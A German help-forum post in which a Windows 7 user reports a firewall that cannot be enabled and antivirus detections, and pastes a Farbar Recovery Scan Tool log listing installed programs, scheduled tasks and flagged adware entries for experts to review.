Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: WIN 7 Firewall nicht aktivierbar/Avira meldet Funde

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML

Antwort
Alt 06.12.2015, 13:56   #1
Polte
 
WIN 7 Firewall nicht aktivierbar/Avira meldet Funde - Standard

WIN 7 Firewall nicht aktivierbar/Avira meldet Funde



Hallo Forengemeinde,

gestern bekam ich über meinen kostenfreien Virenscanner eine Mitteilung zu 2 Funden.
Ich glaube diese Funde existieren schon länger auf meinem PC, da ich sie aber immer irgendwie löschen konnte hatte ich mir nichts dabei gedacht.

Nun habe ich aber mal rausgelesen dass dies wohl doch nicht so ein kleiner Virus sein könnte. Daher wende ich mich an euch.

Was habe ich bisher getan:

Gemäß eurer Anleitung habe ich diese Schritte unternommen:
1. defogger ausgeführt
2. Farbar's Recovery Scan Tool ausgeführt
3. GMER ausgeführt(hier war leider ein speichern der Datei nicht möglich)

Weiterhin habe ich noch die Log Datei von Avira und ich habe heute Malwarebytes laufen lassen und ebenfalls eine Log Datei.

Ich hoffe die Infos waren so erstmal ausreichend und die Datein sind alle korrekt.
Ich danke schonmal im Voraus für die Mühe und Hilfe

Grüße

Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-12-2015
durchgeführt von Steffen (2015-12-06 12:31:25)
Gestartet von C:\Users\Steffen\Downloads
Windows 7 Home Premium (X64) (2011-11-15 15:10:28)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-336442205-827502387-1674173946-500 - Administrator - Disabled)
Gast (S-1-5-21-336442205-827502387-1674173946-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-336442205-827502387-1674173946-1002 - Limited - Enabled)
Steffen (S-1-5-21-336442205-827502387-1674173946-1001 - Administrator - Enabled) => C:\Users\Steffen

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Microsoft Security Essentials (Enabled - Up to date) {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
AS: Microsoft Security Essentials (Enabled - Up to date) {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

„Windows Live Essentials“ (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
„Windows Live Mail“ (x32 Version: 15.4.3502.0922 - „Microsoft Corporation“) Hidden
„Windows Live Messenger“ (x32 Version: 15.4.3502.0922 - „Microsoft Corporation“) Hidden
„Windows Live“ fotogalerija (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
7-Zip 9.20 (HKLM-x32\...\7-Zip) (Version:  - )
Adobe Flash Player 19 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 19.0.0.245 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.13) - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AB0000000001}) (Version: 11.0.13 - Adobe Systems Incorporated)
Agatha Christie - Death on the Nile (x32 Version: 2.2.0.82 - WildTangent) Hidden
Amazon MP3-Downloader 1.0.18 (HKU\S-1-5-21-336442205-827502387-1674173946-1001\...\Amazon MP3-Downloader) (Version: 1.0.18 - Amazon Services LLC)
Apple Application Support (HKLM-x32\...\{A83279FD-CA4B-4206-9535-90974DE76654}) (Version: 2.1.5 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 9.0 - Atheros)
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.15.125 - Avira Operations GmbH & Co. KG)
Avira Launcher (HKLM-x32\...\{59c4462d-a177-4d44-a95b-deda1be79844}) (Version: 1.1.49.18939 - Avira Operations GmbH & Co. KG)
Avira Launcher (x32 Version: 1.1.49.18939 - Avira Operations GmbH & Co. KG) Hidden
BatteryLifeExtender (HKLM-x32\...\{FFD0E594-823B-4E2B-B680-720B3C852588}) (Version: 1.0.11 - Samsung)
Bejeweled 2 Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Broadcom 802.11 Network Adapter (HKLM\...\Broadcom 802.11 Network Adapter) (Version: 5.60.48.55 - Broadcom Corporation)
Build-a-lot (x32 Version: 2.2.0.82 - WildTangent) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 4.09 - Piriform)
Chuzzle Deluxe (x32 Version: 2.2.0.82 - WildTangent) Hidden
CyberLink Media Suite (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 8.0.2227 - CyberLink Corp.)
CyberLink Media+ Player10 (HKLM-x32\...\InstallShield_{34FBC7C4-CD31-4D93-A428-0E524EAC4586}) (Version: 10.0.1110.00 - CyberLink Corp.)
CyberLink MediaShow (HKLM-x32\...\InstallShield_{80E158EA-7181-40FE-A701-301CE6BE64AB}) (Version: 5.0.1130a - CyberLink Corp.)
CyberLink Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.1.3802 - CyberLink Corp.)
CyberLink PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 8.0.3306 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.1.3509 - CyberLink Corp.)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Diner Dash 2 Restaurant Rescue (x32 Version: 2.2.0.82 - WildTangent) Hidden
Easy Content Share (HKLM-x32\...\{2DDC70C1-C77A-4D08-89D2-9AB648504533}) (Version: 1.0 - Samsung Electronics Co., LTD)
Easy Display Manager (HKLM-x32\...\{17283B95-21A8-4996-97DA-547A48DB266F}) (Version: 3.2 - Samsung Electronics Co., Ltd.)
Easy Migration (HKLM-x32\...\{AD86049C-3D9C-43E1-BE73-643F57D83D50}) (Version: 1.0.0.5 - Samsung Electronics Co., Ltd.)
Easy Network Manager (HKLM-x32\...\{8732818E-CA78-4ACB-B077-22311BF4C0E4}) (Version: 4.4.7 - Samsung)
Easy SpeedUp Manager (HKLM-x32\...\{EF367AA4-070B-493C-9575-85BE59D789C9}) (Version: 2.1.1.1 - Samsung Electronics Co.,Ltd.)
EasyBatteryManager (HKLM-x32\...\{4A331D24-A9E8-484F-835E-1BA7B139689C}) (Version: 4.0.0.4 - Samsung)
EasyFileShare (HKLM-x32\...\{16880765-677F-440B-B16A-BFD9B9C00012}) (Version: 1.0.12 - Samsung)
ElsterFormular (HKLM-x32\...\ElsterFormular) (Version: 16.1.20150309 - Landesfinanzdirektion Thüringen)
Farm Frenzy (x32 Version: 2.2.0.82 - WildTangent) Hidden
Fast Start (HKLM-x32\...\{77F45ECD-FAFC-45A8-8896-CFFB139DAAA3}) (Version: 2.2.0.1 - SAMSUNG)
Fotogalerija Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Freizeitkarte_BEL (Ausgabe 15.01) (HKLM-x32\...\Freizeitkarte_BEL) (Version:  - )
FUSSBALL MANAGER 13 (HKLM-x32\...\{80AF0300-866F-400F-A350-D53E3C3E34E0}) (Version: 1.0.0.0 - Electronic Arts)
Galeria de Fotografias do Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galería fotográfica de Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galeria fotografii usługi Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galerie de photos Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Galerie foto Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Garmin BaseCamp (HKLM-x32\...\{31A67F6C-D79D-47B9-9F0B-13C0FCF3C3A8}) (Version: 4.4.6 - Garmin Ltd or its subsidiaries)
Garmin MapConverter (HKLM-x32\...\{EE5F1C98-986A-4722-ACB2-77719B558DEF}) (Version: 2.1.1 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM-x32\...\{3D5D6CFC-3097-425A-8D8F-7EAF5D57641D}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
Google Earth (HKLM-x32\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Insaniquarium Deluxe (x32 Version: 2.2.0.82 - WildTangent) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 7.0.0.1144 - Intel Corporation)
Intel(R) PROSet/Wireless WiFi Software (HKLM\...\{1927E640-A2C6-4BA7-8F43-FFD2AE3DFCF3}) (Version: 14.0.2000 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 10.0.0.1046 - Intel Corporation)
IPTInstaller (HKLM-x32\...\{08208143-777D-4A06-BB54-71BF0AD1BB70}) (Version: 4.0.9 - HTC)
Java(TM) 6 Update 22 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83216022FF}) (Version: 6.0.220 - Oracle)
John Deere Drive Green (x32 Version: 2.2.0.82 - WildTangent) Hidden
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Malwarebytes Anti-Malware Version 2.2.0.1024 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.0.1024 - Malwarebytes)
Mesh Runtime (x32 Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4.5 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft .NET Framework 4.5 DEU Language Pack (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50709 - Microsoft Corporation)
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Klick-und-Los 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - Deutsch (HKLM-x32\...\{90140011-0066-0407-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.8.204.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.10411.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{4fcf070a-daac-45e9-a8b0-6850941f7ed8}) (Version: 12.0.21005.1 - Microsoft Corporation)
Movie Color Enhancer (HKLM-x32\...\{7F6F62F0-7884-4CFB-B86C-597A4A6D9C4D}) (Version: 1.0 - Samsung Electronics Co., Ltd.)
Mozilla Firefox 42.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 42.0 (x86 de)) (Version: 42.0 - Mozilla)
NVIDIA Grafiktreiber 267.54 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 267.54 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.2.22.1 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.2.22.1 - NVIDIA Corporation)
OpenOffice.org 3.3 (HKLM-x32\...\{4286716B-1287-48E7-9078-3DC8248DBA96}) (Version: 3.3.9567 - OpenOffice.org)
Origin (HKLM-x32\...\Origin) (Version: 9.0.11.77 - Electronic Arts, Inc.)
PDFCreator (HKLM-x32\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 1.2.3 - Frank Heindörfer, Philip Chinery)
Peggle (x32 Version: 2.2.0.82 - WildTangent) Hidden
Penguins! (x32 Version: 2.2.0.82 - WildTangent) Hidden
PhoneShare (HKLM-x32\...\{3F50512F-53DF-46B1-8CCB-6C7E638CADD6}) (Version: 9.1.4 - Samsung)
Plants vs. Zombies (x32 Version: 2.2.0.82 - WildTangent) Hidden
Poczta usługi Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Podstawowe programy Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Polar Golfer (x32 Version: 2.2.0.82 - WildTangent) Hidden
Pošta Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Raccolta foto di Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.40.126.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6318 - Realtek Semiconductor Corp.)
Samsung AnyWeb Print (HKLM-x32\...\{318DBE01-1E6B-4243-84B0-210391FE789A}) (Version: 2.0.67.1 - Samsung Electronics Co., Ltd.)
Samsung Printer Live Update (HKLM-x32\...\Samsung Printer Live Update) (Version:  - Samsung Electronics Co., Ltd.)
Samsung Recovery Solution 5 (HKLM-x32\...\{145DE957-0679-4A2A-BB5C-1D3E9808FAB2}) (Version: 5.0.1.0 - Samsung)
Samsung Support Center (HKLM-x32\...\{F687E657-F636-44DF-8125-9FEEA2C362F5}) (Version: 1.1.24 - Samsung)
Samsung Universal Print Driver (HKLM-x32\...\Samsung Universal Print Driver) (Version: 2.02.05.00:27 - Samsung Electronics Co., Ltd.)
Samsung Universal Scan Driver (HKLM-x32\...\Samsung Universal Scan Driver) (Version: 1.2.5.0 - Samsung Electronics Co., Ltd.)
Samsung Update Plus (HKLM-x32\...\{142D8CA7-2C6F-45A7-83E3-099AAFD99133}) (Version: 3.0.1.17 - Samsung Electronics Co., Ltd.)
Savings Sidekick (HKLM-x32\...\Savings Sidekick) (Version: 1.23.151.151 - 215 Apps)
SISShortcut (HKLM-x32\...\{FDAE128F-A355-42B1-8422-1AF3ACEE34F4}) (Version: 1.00.000 - Samsung)
SRS Premium Sound Control Panel (HKLM\...\{F3C66EC8-2F33-452D-9CFF-E8C886B3ECC4}) (Version: 1.11.1300 - SRS Labs, Inc.)
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 15.2.11.1 - Synaptics Incorporated)
Tinypic 3.18 (HKLM-x32\...\{E3723A04-A894-4036-A78E-282E18F43C0A}_is1) (Version: Tinypic 3.18 - E. Fiedler)
Überwachungstool für die Intel® Turbo-Boost-Technik 2.0 (HKLM\...\{B77EFA0B-9BD3-4122-9F9A-15A963B5EA24}) (Version: 2.0.82.0 - Intel)
Updater Service (HKLM-x32\...\Updater Service) (Version: 14,12,8,9 - ) <==== ACHTUNG
User Guide (HKLM-x32\...\{BAE68339-B0F6-4D33-9554-5A3DB2DFF5DA}) (Version: 1.0 - )
VideoPerformer (HKLM-x32\...\VideoPerformer) (Version:  - PerformerSoft LLC) <==== ACHTUNG
WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.1.5 - WildTangent)
WildTangent ORB Game Console (x32 Version:  - WildTangent) Hidden
Windows Driver Package - Garmin (grmnusb) GARMIN Devices  (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Live 程式集 (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
WordCaptureX Pro (HKLM-x32\...\{139C1D95-9037-3AB3-F5F4-4A79BF6831EC}) (Version: 4.0.0 - Deskperience)
Zuma Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden
Συλλογή φωτογραφιών του Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Основные компоненты Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Почта Windows Live (x32 Version: 15.4.3502.0922 - Корпорация Майкрософт) Hidden
Фотоальбом Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Фотогалерия на Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
גלריית התמונות של Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
بريد Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
معرض صور Windows Live (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-336442205-827502387-1674173946-1001_Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32 -> C:\Users\Steffen\AppData\Local\{2d9ad138-ebfb-785b-bdaf-9765f825eba8}\n. => Keine Datei

==================== Wiederherstellungspunkte =========================

30-08-2015 18:00:10 Windows-Sicherung
06-09-2015 18:00:34 Windows-Sicherung
13-09-2015 20:10:37 Windows-Sicherung
21-09-2015 07:57:49 Windows-Sicherung
27-09-2015 18:10:38 Windows-Sicherung
04-10-2015 18:22:22 Windows-Sicherung
11-10-2015 18:00:27 Windows-Sicherung
18-10-2015 18:00:20 Windows-Sicherung
25-10-2015 21:42:01 Windows-Sicherung
01-11-2015 19:00:21 Windows-Sicherung
08-11-2015 19:00:32 Windows-Sicherung
15-11-2015 20:10:57 Windows-Sicherung
22-11-2015 19:00:18 Windows-Sicherung
29-11-2015 19:00:32 Windows-Sicherung

==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 03:34 - 2009-06-10 22:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0EAFD584-9675-4985-ADF7-BC9F45104A8A} - System32\Tasks\EasyBatteryManager => C:\Program Files (x86)\Samsung\EasyBatteryManager\EasyBatteryMgr4.exe [2010-07-20] (SAMSUNG Electronics co., LTD.)
Task: {225DEAF4-C48B-42FD-A94F-D191AACC4CD9} - System32\Tasks\WifiManager => C:\Program Files (x86)\Samsung\Easy Display Manager\WifiManager.exe [2011-01-04] (Samsung Electronics Co., Ltd.)
Task: {29152975-46D0-4468-BB91-AB8E5784E20E} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2010-11-10] (CyberLink)
Task: {32C59580-8411-4434-AF66-8D29DA4AAF25} - System32\Tasks\SRS Premium Sound => C:\Program Files\SRS Labs\SRS Control Panel\srspanel_64.exe [2011-02-24] (SRS Labs, Inc.)
Task: {3F830B4D-83C1-40A7-925A-1C8D5CFEE934} - System32\Tasks\advSRS5 => C:\Program Files (x86)\Samsung\Samsung Recovery Solution 5\WCScheduler.exe [2011-02-14] (SEC)
Task: {4F94A0B4-B548-4164-AE96-18B6A020E3F5} - System32\Tasks\SmartRestarter => C:\Program Files\Samsung\SamsungFastStart\SmartRestarter.exe [2010-08-05] (Samsung Electronics Co., Ltd.)
Task: {51BAE38F-4255-4600-B304-AAD3125ECDAE} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe
Task: {54A2DECD-2877-4667-8FDF-28F6F0ABFE3F} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-12-17] (Piriform Ltd)
Task: {61ACC99B-FADC-430F-A13B-1A2543881EC1} - System32\Tasks\SUPBackground => C:\Program Files (x86)\Samsung\Samsung Update Plus\SUPBackground.exe [2011-12-20] (Samsung Electronics)
Task: {76B8A142-0CE6-408C-A20E-66914AD18C65} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2015-10-28] (Adobe Systems Incorporated)
Task: {A9088378-A70F-4BDF-81E3-A8EB12C0C5C0} - System32\Tasks\MovieColorEnhancer => C:\Program Files (x86)\Samsung\Movie Color Enhancer\MovieColorEnhancer.exe [2010-11-29] (Samsung Electronics Co., Ltd.)
Task: {AB80217E-F7D0-4CA8-B354-11401ACC012E} - System32\Tasks\SamsungSupportCenter => C:\Program Files (x86)\Samsung\Samsung Support Center\SSCKbdHk.exe [2011-02-07] (SAMSUNG Electronics)
Task: {B03A3706-B97D-4AEE-8EE6-2114D3F3B5B1} - System32\Tasks\EasyDisplayMgr => C:\Program Files (x86)\Samsung\Easy Display Manager\dmhkcore.exe [2010-12-23] (Samsung Electronics Co., Ltd.)
Task: {BC283340-5DDD-4B81-B77B-8620A0708D27} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-11-25] (Adobe Systems Incorporated)
Task: {C2A20F07-1A5F-4E29-A6D5-5072083BFE3D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {CA315BDE-D06B-4EC6-99C5-72FFBD40C083} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {D3CA7303-5202-4FDA-A643-07AF751C9A80} - System32\Tasks\BatteryLifeExtender => C:\Program Files (x86)\Samsung\BatteryLifeExtender\BatteryLifeExtender.exe [2010-12-18] (Samsung Electronics. Co. Ltd.)
Task: {D641BC3F-5ED3-4177-AE67-040B4B06FA00} - System32\Tasks\EasySpeedUpManager => C:\Program Files (x86)\Samsung\EasySpeedUpManager\EasySpeedUpManager2.exe [2010-12-23] (Samsung Electronics)
Task: {FB57CD7B-1B76-48DD-855F-82CD811187AE} - System32\Tasks\{D2806C21-5719-47A3-B8A2-8A22E4A26DCB} => pcalua.exe -a F:\HTCDrivers\HTCDriverInstaller.exe -d F:\HTCDrivers

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2012-01-03 12:54 - 2005-03-12 01:07 - 00087040 _____ () C:\Windows\System32\pdfcmnnt.dll
2011-03-18 06:36 - 2008-06-05 00:53 - 00027648 _____ () C:\Windows\System32\spd__l.dll
2013-10-17 15:27 - 2013-10-17 15:27 - 00166912 _____ () C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
2011-03-18 00:01 - 2009-12-01 08:21 - 00244904 ____N () C:\Program Files (x86)\CyberLink\Shared files\RichVideo.exe
2013-05-22 19:50 - 2013-05-22 19:50 - 00400704 _____ () C:\Users\Steffen\AppData\Local\Program Files\Amazon\MP3 Downloader\AmazonMP3DownloaderHelper.exe
2011-03-18 06:37 - 2010-10-21 19:22 - 00709632 _____ () C:\Windows\system32\SnMinDrv.dll
2011-03-18 00:06 - 2006-08-12 04:48 - 00049152 _____ () C:\Program Files (x86)\Samsung\Easy Display Manager\HookDllPS2.dll
2011-01-17 16:19 - 2011-11-23 15:36 - 00985088 _____ () C:\Program Files (x86)\OpenOffice.org 3\program\libxml2.dll
2011-03-18 00:07 - 2010-07-05 11:42 - 00203776 _____ () C:\Program Files (x86)\Samsung\Movie Color Enhancer\WinCRT.dll
2011-03-18 00:14 - 2010-05-07 15:22 - 01636864 _____ () C:\Program Files (x86)\Samsung\Samsung Recovery Solution 5\Resdll.dll
2009-11-02 06:20 - 2009-11-02 06:20 - 00619816 _____ () C:\Program Files (x86)\CyberLink\Power2Go\CLMediaLibrary.dll
2009-11-02 06:23 - 2009-11-02 06:23 - 00013096 _____ () C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvcPS.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)

AlternateDataStreams: C:\ProgramData\Temp:DCE70D73

==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-336442205-827502387-1674173946-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Steffen\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.0.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
MpsSvc => Firewall Dienst läuft nicht.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\fotobuch.de\Designer 2.0\Designer.exe] => Designer.exe

==================== Fehlerhafte Geräte im Gerätemanager =============

